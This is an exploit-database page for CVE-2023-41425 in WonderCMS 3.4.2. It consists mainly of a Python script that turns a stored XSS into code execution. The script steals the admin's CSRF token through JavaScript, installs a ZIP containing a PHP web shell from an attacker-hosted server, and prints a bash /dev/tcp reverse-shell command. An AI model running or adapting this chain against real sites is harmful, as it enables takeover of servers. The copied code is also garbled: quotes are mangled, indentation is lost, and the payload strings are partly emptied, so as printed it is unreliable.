WonderCMS 3.4.2 Cross Site Scripting / Code Execution

April 23, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title WonderCMS 3.4.2 Cross Site Scripting / Code Execution
Exploit ID PACKETSTORM:190575
Type packetstorm
Published 2025-04-21T00:00:00
Modified 2025-04-21T00:00:00

CVSS Information

CVSS Score 6.1
Severity MEDIUM
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2023-41425

Exploit Description

WonderCMS version 3.4.2…

Exploit Code

# Exploit Title: WonderCMS v3.4.2 XSS to RCE
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# CVE: CVE-2023-41425

import requests
import argparse
from argparse import RawTextHelpFormatter
import os
import subprocess
import zipfile
from termcolor import colored

def main():
parser = argparse.ArgumentParser(description=”Exploit Wonder CMS v3.4.2
XSS to RCE”, formatter_class=RawTextHelpFormatter)
parser.add_argument(“–url”, required=True, help=”Target URL of
loginURL (Example: http://sea.htb/loginURL)”)
parser.add_argument(“–xip”, required=True, help=”IP for HTTP web
server that hosts the malicious .js file”)
parser.add_argument(“–xport”, required=True, help=”Port for HTTP web
server that hosts the malicious .js file”)
args = parser.parse_args()

target_login_url = args.url
target_split = args.url.split(‘/’)
target_url = target_split[0] + ‘//’ + target_split[2]

# Web Shell
print(“[+] Creating PHP Web Shell”)
if not os.path.exists(‘malicious’):
os.mkdir(‘malicious’)
with open (‘malicious/malicious.php’, ‘w’) as f:
f.write(‘‘)
with zipfile.ZipFile(‘./malicious.zip’, ‘w’) as z:
z.write(‘malicious/malicious.php’)
os.remove(‘malicious/malicious.php’)
os.rmdir(‘malicious’)
else:
print(colored(“[!] Directory malicious already exists!”, ‘yellow’))

# Malicious .js
js = f”’var token =
document.querySelectorAll(‘[name=”token”]’)[0].value;
var module_url =
“{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=”
+ token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open(“GET”, module_url);
xhr.send();”’

print(“[+] Writing malicious.js”)
with open(‘malicious.js’, ‘w’) as f:
f.write(js)

xss_payload = args.url.replace(“loginURL”,
“index.php?page=loginURL?”)+”\”>

“+args.xip+”:”+args.xport+”/malicious.js\”> print(“[+] XSS Payload:”)
print(colored(f”{xss_payload}”, ‘red’))

print(“[+] Web Shell can be accessed once .zip file has been
requested:”)

print(colored(f”{target_url}/themes/malicious/malicious.php?cmd=“,
‘red’))
print(“[+] To get a reverse shell connection run the following:”)
print(colored(f”curl -s ‘{target_url}/themes/malicious/malicious.php’
–get –data-urlencode \”cmd=bash -c ‘bash -i >& /dev/tcp//
0>&1’\” “, ‘yellow’))

print(“[+] Starting HTTP server”)
subprocess.run([“python3”, “-m”, “http.server”, “-b”, args.xip,
args.xport])

if __name__ == “__main__”:
main()

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.